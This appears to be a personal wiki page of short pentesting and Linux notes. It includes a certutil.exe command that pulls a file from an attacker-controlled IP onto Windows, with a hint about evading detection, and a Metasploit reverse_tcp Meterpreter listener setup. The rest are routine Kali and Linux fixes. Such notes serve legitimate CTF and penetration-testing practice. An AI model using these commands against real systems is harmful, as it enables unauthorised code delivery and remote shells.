Pages

Search

Wiki

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command will download the «file» in the Windows machine from «http://<ip>« certutil.exe -urlcache -split -f http:///file file Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from https://www.bleepingcomputer.com. The trick is based on a base64 encoding file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. https://github.com/Tib3rius/AutoRecon Run installation script $ python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git Add /home/ruben/.local/bin to your PATH. Other requirements installation: & sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner

GIT Workflow

Create a Metasploit listener

Steps to create a Metasploit listener: msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 10.10.14.13 msf5 exploit(multi/handler) > set lport 9999 msf5 exploit(multi/handler) > set ExitOnSession false msf5 exploit(multi/handler) > exploit -j sessions -i 1

(Solution) – Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable

Using Metasploit I’ve sometimes seen this error:  [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:1234). To solve it:  List processes listening on port 1234 lsof -i :1234 Kill a process with process ID 5678 kill -9 5678

(Solution) Could not apply stored configuration to monitors error

I received this annoying message every time I logged-in in my Linux distro. After a small search with Google I found this solution: cd .cofig mv monitors.xml monitors.xml.oldexit Restart and you won’t see that message again.

(Solution) Add a new directory to home path in Linux

To add a new directory to your home path you just have to append the new directory to the PATH: $vim .bashrc In the last line of the file just add this: export PATH=$PATH:/homr/username/newDirectory/ Finally, restart your terminal.

(Solution) How to get dkpg install the dependencies that requires

kali@kali:~/downloads$ sudo dpkg -i terminus-1.0.106-linux.deb kali@kali:~/downloads$ sudo apt-get -f install kali@kali:~/downloads$ sudo dpkg -i terminus-1.0.106-linux.deb

(Solution) Change python default version (Kali linux)

kali@kali:/bin$ update-alternatives –list python kali@kali:/bin$ sudo update-alternatives –install /usr/bin/python python /usr/bin/python2.7 1 kali@kali:/bin$ sudo update-alternatives –install /usr/bin/python python /usr/bin/python3.7 2 kali@kali:/bin$ sudo update-alternatives –install /usr/bin/python python /usr/bin/python3.8 3 kali@kali:/bin$ sudo update-alternatives –config python  Finally test everything is ok. 

(Solution) Install python-pip in Kali Linux

ruben@kali:/etc/apt$ sudo apt search python-pip ruben@kali:/etc/apt$ sudo apt search python3-pip ruben@kali:/etc/apt$ sudo apt install python3-pip Downloading the specific package and installing with dkpg can solve also the issue. https://packages.debian.org/buster/all/python-pip/download